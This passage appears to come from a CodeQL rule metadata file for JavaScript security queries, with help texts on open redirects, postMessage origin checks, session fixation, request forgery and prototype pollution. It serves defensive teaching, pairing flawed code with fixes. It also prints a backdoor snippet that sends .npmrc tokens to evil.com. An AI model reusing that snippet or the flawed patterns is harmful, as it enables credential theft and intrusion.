- } - }, { - "id" : "js/identity-replacement", - "name" : "js/identity-replacement", - "shortDescription" : { - "text" : "Replacement of a substring with itself" - }, - "fullDescription" : { - "text" : "Replacing a substring with itself has no effect and may indicate a mistake." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. 
Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. 
Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-116" ], - "description" : "Replacing a substring with itself has no effect and may indicate a mistake.", - "id" : "js/identity-replacement", - "kind" : "problem", - "name" : "Replacement of a substring with itself", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/unsafe-external-link", - "name" : "js/unsafe-external-link", - "shortDescription" : { - "text" : "Potentially unsafe external link" - }, - "fullDescription" : { - "text" : "External links that open in a new tab or window but do not specify link type 'noopener' or 'noreferrer' are a potential security risk." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n", - "markdown" : "# Potentially unsafe external link\nHTML links that open in a new tab or window allow the target page to access the DOM of the origin page using `window.opener` unless link type `noopener` or `noreferrer` is specified. This is a potential security risk.\n\n\n## Recommendation\nSpecify the link type by adding an attribute `rel=\"noopener noreferrer\"`.\n\n\n## Example\nIn the following example, a JSX element is created that corresponds to an HTML link opening the URL `http://example.com` in a new tab. 
Since it does not specify a link type, that page will be able to access the DOM of the origin page.\n\n\n```javascript\nvar link = Example;\n\n```\nTo fix this vulnerability, add a `rel` attribute:\n\n\n```javascript\nvar link = Example;\n\n```\n\n## References\n* Mathias Bynens: [About rel=noopener](https://mathiasbynens.github.io/rel-noopener/).\n* Mozilla Developer Network: [HTML Anchor Element](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/a).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-1022](https://cwe.mitre.org/data/definitions/1022.html).\n" - }, - "properties" : { - "tags" : [ "maintainability", "security", "external/cwe/cwe-200", "external/cwe/cwe-1022" ], - "description" : "External links that open in a new tab or window but do not specify\n link type 'noopener' or 'noreferrer' are a potential security risk.", - "id" : "js/unsafe-external-link", - "kind" : "problem", - "name" : "Potentially unsafe external link", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/regex/missing-regexp-anchor", - "name" : "js/regex/missing-regexp-anchor", - "shortDescription" : { - "text" : "Missing regular expression anchor" - }, - "fullDescription" : { - "text" : "Regular expressions without anchors can be vulnerable to bypassing." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. 
Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. 
As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. 
Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n let url = req.param(\"url\");\n // GOOD: the host of `url` can not be controlled by an attacker\n if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n res.redirect(url);\n }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Regular expressions without anchors can be vulnerable to bypassing.", - "id" : "js/regex/missing-regexp-anchor", - "kind" : "problem", - "name" : "Missing regular expression anchor", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/missing-origin-check", - "name" : "js/missing-origin-check", - "shortDescription" : { - "text" : "Missing origin verification in `postMessage` handler" - }, - "fullDescription" : { - "text" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. 
It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n", - "markdown" : "# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n let origin = event.origin.toLowerCase();\n\n console.log(origin)\n // BAD: the origin property is not checked\n eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. 
It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n console.log(event.origin)\n // GOOD: the origin property is checked\n if (event.origin === 'https://www.example.com') {\n // do something\n }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-940" ], - "description" : "Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.", - "id" : "js/missing-origin-check", - "kind" : "problem", - "name" : "Missing origin verification in `postMessage` handler", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "5" - } - }, { - "id" : "js/file-access-to-http", - "name" : "js/file-access-to-http", - "shortDescription" : { - "text" : "File data in outbound network request" - }, - "fullDescription" : { - "text" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n", - "markdown" : "# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. 
It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n hostname: \"evil.com\",\n path: \"/upload\",\n method: \"GET\",\n headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-200" ], - "description" : "Directly sending file data in an outbound network request can indicate unauthorized information disclosure.", - "id" : "js/file-access-to-http", - "kind" : "path-problem", - "name" : "File data in outbound network request", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/session-fixation", - "name" : "js/session-fixation", - "shortDescription" : { - "text" : "Failure to abandon session" - }, - "fullDescription" : { - "text" : "Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. 
Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with 
Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n", - "markdown" : "# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' && req.body.password === 'admin') {\n req.session.authenticated = true;\n res.redirect('/');\n } else {\n res.redirect('/login');\n }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n // Check that username password matches\n if (req.body.username === 'admin' 
&& req.body.password === 'admin') {\n req.session.regenerate(function (err) {\n if (err) {\n res.send('Error');\n } else {\n req.session.authenticated = true;\n res.redirect('/');\n }\n });\n } else {\n res.redirect('/login');\n }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-384" ], - "description" : "Reusing an existing session as a different user could allow\n an attacker to access someone else's account by using\n their session.", - "id" : "js/session-fixation", - "kind" : "problem", - "name" : "Failure to abandon session", - "precision" : "medium", - "problem.severity" : "warning", - "security-severity" : "5" - } - }, { - "id" : "js/client-side-request-forgery", - "name" : "js/client-side-request-forgery", - "shortDescription" : { - "text" : "Client-side request forgery" - }, - "fullDescription" : { - "text" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. 
A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. 
Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", - "markdown" : "# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. 
Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + query.get('message_id');\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. 
Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n const query = new URLSearchParams(location.search);\n const url = '/api/messages/' + Number(query.get('message_id'));\n const data = await (await fetch(url)).json();\n document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-918" ], - "description" : "Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n against the client.", - "id" : "js/client-side-request-forgery", - "kind" : "path-problem", - "name" : "Client-side request forgery", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "5.0" - } - }, { - "id" : "js/remote-property-injection", - "name" : "js/remote-property-injection", - "shortDescription" : { - "text" : "Remote property injection" - }, - "fullDescription" : { - "text" : "Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. 
This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". 
If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. 
Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. 
